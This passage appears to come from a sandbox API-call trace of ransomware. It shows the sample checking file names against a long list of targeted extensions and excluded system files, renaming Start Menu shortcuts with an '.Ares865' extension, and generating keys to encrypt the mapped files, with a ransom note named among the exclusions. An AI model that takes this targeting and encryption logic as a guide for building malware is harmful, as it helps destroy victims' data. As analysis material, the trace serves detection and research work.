lstrlenW (lpString="maw") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0092.604] lstrlenW (lpString="mdbhtml") returned 7 [0092.604] lstrcmpiW (lpString1="ter.lnk", lpString2="mdbhtml") returned 1 [0092.604] lstrlenW (lpString="mdn") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0092.604] lstrlenW (lpString="mdt") returned 3 [0092.604] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0092.605] lstrlenW (lpString="mfd") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0092.605] lstrlenW (lpString="mpd") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0092.605] lstrlenW (lpString="mrg") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0092.605] lstrlenW (lpString="mud") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0092.605] lstrlenW (lpString="mwb") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0092.605] lstrlenW (lpString="myd") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0092.605] lstrlenW (lpString="ndf") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0092.605] lstrlenW (lpString="nnt") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0092.605] lstrlenW (lpString="nrmlib") returned 6 [0092.605] lstrcmpiW (lpString1="er.lnk", lpString2="nrmlib") returned -1 [0092.605] lstrlenW (lpString="ns2") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0092.605] lstrlenW (lpString="ns3") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0092.605] lstrlenW (lpString="ns4") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0092.605] lstrlenW (lpString="nsf") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0092.605] lstrlenW (lpString="nv") returned 2 [0092.605] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0092.605] lstrlenW (lpString="nv2") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0092.605] lstrlenW (lpString="nwdb") returned 4 [0092.605] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0092.605] lstrlenW (lpString="nyf") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0092.605] lstrlenW (lpString="odb") returned 3 [0092.605] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.606] lstrlenW (lpString="odb") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0092.606] lstrlenW (lpString="oqy") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0092.606] lstrlenW (lpString="ora") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0092.606] lstrlenW (lpString="orx") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0092.606] lstrlenW (lpString="owc") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0092.606] lstrlenW (lpString="p96") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0092.606] lstrlenW (lpString="p97") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0092.606] lstrlenW (lpString="pan") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0092.606] lstrlenW (lpString="pdb") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0092.606] lstrlenW (lpString="pdm") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0092.606] lstrlenW (lpString="pnz") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0092.606] lstrlenW (lpString="qry") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0092.606] lstrlenW (lpString="qvd") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0092.606] lstrlenW (lpString="rbf") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0092.606] lstrlenW (lpString="rctd") returned 4 [0092.606] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0092.606] lstrlenW (lpString="rod") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0092.606] lstrlenW (lpString="rodx") returned 4 [0092.606] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0092.606] lstrlenW (lpString="rpd") returned 3 [0092.606] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0092.607] lstrlenW (lpString="rsd") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0092.607] lstrlenW (lpString="sas7bdat") returned 8 [0092.607] lstrcmpiW (lpString1="uter.lnk", lpString2="sas7bdat") returned 1 [0092.607] lstrlenW (lpString="sbf") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0092.607] lstrlenW (lpString="scx") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0092.607] lstrlenW (lpString="sdb") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0092.607] lstrlenW (lpString="sdc") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0092.607] lstrlenW (lpString="sdf") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0092.607] lstrlenW (lpString="sis") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0092.607] lstrlenW (lpString="spq") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0092.607] lstrlenW (lpString="te") returned 2 [0092.607] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0092.607] lstrlenW (lpString="teacher") returned 7 [0092.607] lstrcmpiW (lpString1="ter.lnk", lpString2="teacher") returned 1 [0092.607] lstrlenW (lpString="tmd") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0092.607] lstrlenW (lpString="tps") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0092.607] lstrlenW (lpString="trc") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.607] lstrlenW (lpString="trc") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0092.607] lstrlenW (lpString="trm") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0092.607] lstrlenW (lpString="udb") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0092.607] lstrlenW (lpString="udl") returned 3 [0092.607] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0092.608] lstrlenW (lpString="usr") returned 3 [0092.608] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0092.608] lstrlenW (lpString="v12") returned 3 [0092.608] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0092.608] lstrlenW (lpString="vis") returned 3 [0092.608] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0092.608] lstrlenW (lpString="vpd") returned 3 [0092.608] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0092.608] lstrlenW (lpString="vvv") returned 3 [0092.608] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0092.608] lstrlenW (lpString="wdb") returned 3 [0092.608] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0092.608] lstrlenW (lpString="wmdb") returned 4 [0092.608] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0092.608] lstrlenW (lpString="wrk") returned 3 [0092.608] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0092.608] lstrlenW (lpString="xdb") returned 3 [0092.608] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0092.608] lstrlenW (lpString="xld") returned 3 [0092.608] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0092.608] lstrlenW (lpString="xmlff") returned 5 [0092.608] lstrcmpiW (lpString1="r.lnk", lpString2="xmlff") returned -1 [0092.608] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.Ares865") returned 95 [0092.608] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\computer.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\computer.lnk.ares865"), dwFlags=0x1) returned 1 [0092.610] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\computer.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.610] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262) returned 1 [0092.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.610] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.610] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.611] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.611] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.612] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x15c [0092.613] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0092.614] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.615] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.615] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.615] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.615] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.615] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.615] CloseHandle (hObject=0x15c) returned 1 [0092.616] CloseHandle (hObject=0x118) returned 1 [0092.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.616] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.616] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e084aaf, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Control Panel.lnk", cAlternateFileName="CONTRO~1.LNK")) returned 1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="aoldtz.exe") returned 1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".") returned 1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="..") returned 1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="windows") returned -1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="bootmgr") returned 1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="temp") returned -1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="pagefile.sys") returned -1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="boot") returned 1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ids.txt") returned -1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="ntuser.dat") returned -1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="perflogs") returned -1 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2="MSBuild") returned -1 [0092.616] lstrlenW (lpString="Control Panel.lnk") returned 17 [0092.616] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\computer.lnk") returned 87 [0092.616] lstrcpyW (in: lpString1=0x2cce496, lpString2="Control Panel.lnk" | out: lpString1="Control Panel.lnk") returned="Control Panel.lnk" [0092.616] lstrlenW (lpString="Control Panel.lnk") returned 17 [0092.616] lstrlenW (lpString="Ares865") returned 7 [0092.616] lstrcmpiW (lpString1="nel.lnk", lpString2="Ares865") returned 1 [0092.616] lstrlenW (lpString=".dll") returned 4 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".dll") returned 1 [0092.616] lstrlenW (lpString=".lnk") returned 4 [0092.616] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".lnk") returned 1 [0092.616] lstrlenW (lpString=".ini") returned 4 [0092.617] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".ini") returned 1 [0092.617] lstrlenW (lpString=".sys") returned 4 [0092.617] lstrcmpiW (lpString1="Control Panel.lnk", lpString2=".sys") returned 1 [0092.617] lstrlenW (lpString="Control Panel.lnk") returned 17 [0092.617] lstrlenW (lpString="bak") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.617] lstrlenW (lpString="ba_") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.617] lstrlenW (lpString="dbb") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.617] lstrlenW (lpString="vmdk") returned 4 [0092.617] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.617] lstrlenW (lpString="rar") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.617] lstrlenW (lpString="zip") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.617] lstrlenW (lpString="tgz") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.617] lstrlenW (lpString="vbox") returned 4 [0092.617] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.617] lstrlenW (lpString="vdi") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.617] lstrlenW (lpString="vhd") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.617] lstrlenW (lpString="vhdx") returned 4 [0092.617] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.617] lstrlenW (lpString="avhd") returned 4 [0092.617] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.617] lstrlenW (lpString="db") returned 2 [0092.617] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.617] lstrlenW (lpString="db2") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.617] lstrlenW (lpString="db3") returned 3 [0092.617] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.617] lstrlenW (lpString="dbf") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.618] lstrlenW (lpString="mdf") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.618] lstrlenW (lpString="mdb") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.618] lstrlenW (lpString="sql") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.618] lstrlenW (lpString="sqlite") returned 6 [0092.618] lstrcmpiW (lpString1="el.lnk", lpString2="sqlite") returned -1 [0092.618] lstrlenW (lpString="sqlite3") returned 7 [0092.618] lstrcmpiW (lpString1="nel.lnk", lpString2="sqlite3") returned -1 [0092.618] lstrlenW (lpString="sqlitedb") returned 8 [0092.618] lstrcmpiW (lpString1="anel.lnk", lpString2="sqlitedb") returned -1 [0092.618] lstrlenW (lpString="xml") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.618] lstrlenW (lpString="$er") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.618] lstrlenW (lpString="4dd") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.618] lstrlenW (lpString="4dl") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.618] lstrlenW (lpString="^^^") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.618] lstrlenW (lpString="abs") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.618] lstrlenW (lpString="abx") returned 3 [0092.618] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.618] lstrlenW (lpString="accdb") returned 5 [0092.618] lstrcmpiW (lpString1="l.lnk", lpString2="accdb") returned 1 [0092.618] lstrlenW (lpString="accdc") returned 5 [0092.618] lstrcmpiW (lpString1="l.lnk", lpString2="accdc") returned 1 [0092.618] lstrlenW (lpString="accde") returned 5 [0092.618] lstrcmpiW (lpString1="l.lnk", lpString2="accde") returned 1 [0092.618] lstrlenW (lpString="accdr") returned 5 [0092.618] lstrcmpiW (lpString1="l.lnk", lpString2="accdr") returned 1 [0092.618] lstrlenW (lpString="accdt") returned 5 [0092.619] lstrcmpiW (lpString1="l.lnk", lpString2="accdt") returned 1 [0092.619] lstrlenW (lpString="accdw") returned 5 [0092.619] lstrcmpiW (lpString1="l.lnk", lpString2="accdw") returned 1 [0092.619] lstrlenW (lpString="accft") returned 5 [0092.619] lstrcmpiW (lpString1="l.lnk", lpString2="accft") returned 1 [0092.619] lstrlenW (lpString="adb") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.619] lstrlenW (lpString="adb") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.619] lstrlenW (lpString="ade") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.619] lstrlenW (lpString="adf") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.619] lstrlenW (lpString="adn") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.619] lstrlenW (lpString="adp") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.619] lstrlenW (lpString="alf") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.619] lstrlenW (lpString="ask") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.619] lstrlenW (lpString="btr") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.619] lstrlenW (lpString="cat") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.619] lstrlenW (lpString="cdb") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.619] lstrlenW (lpString="ckp") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.619] lstrlenW (lpString="cma") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.619] lstrlenW (lpString="cpd") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.619] lstrlenW (lpString="dacpac") returned 6 [0092.619] lstrcmpiW (lpString1="el.lnk", lpString2="dacpac") returned 1 [0092.619] lstrlenW (lpString="dad") returned 3 [0092.619] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.620] lstrlenW (lpString="dadiagrams") returned 10 [0092.620] lstrcmpiW (lpString1=" Panel.lnk", lpString2="dadiagrams") returned -1 [0092.620] lstrlenW (lpString="daschema") returned 8 [0092.620] lstrcmpiW (lpString1="anel.lnk", lpString2="daschema") returned -1 [0092.620] lstrlenW (lpString="db-journal") returned 10 [0092.620] lstrcmpiW (lpString1=" Panel.lnk", lpString2="db-journal") returned -1 [0092.620] lstrlenW (lpString="db-shm") returned 6 [0092.620] lstrcmpiW (lpString1="el.lnk", lpString2="db-shm") returned 1 [0092.620] lstrlenW (lpString="db-wal") returned 6 [0092.620] lstrcmpiW (lpString1="el.lnk", lpString2="db-wal") returned 1 [0092.620] lstrlenW (lpString="dbc") returned 3 [0092.620] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.620] lstrlenW (lpString="dbs") returned 3 [0092.620] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.620] lstrlenW (lpString="dbt") returned 3 [0092.620] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0092.620] lstrlenW (lpString="dbv") returned 3 [0092.620] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0092.620] lstrlenW (lpString="dbx") returned 3 [0092.620] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0092.620] lstrlenW (lpString="dcb") returned 3 [0092.620] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0092.621] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0092.621] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.Ares865") returned 100 [0092.621] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\control panel.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\control panel.lnk.ares865"), dwFlags=0x1) returned 1 [0092.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Accessories\\System Tools\\Control Panel.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\accessories\\system tools\\control panel.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.623] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=262) returned 1 [0092.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.623] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0092.623] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.624] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.624] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.624] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x15c [0092.626] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0092.626] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.627] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.627] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.627] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.627] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.628] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.628] CloseHandle (hObject=0x15c) returned 1 [0092.628] CloseHandle (hObject=0x118) returned 1 [0092.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0092.628] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.628] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x6, 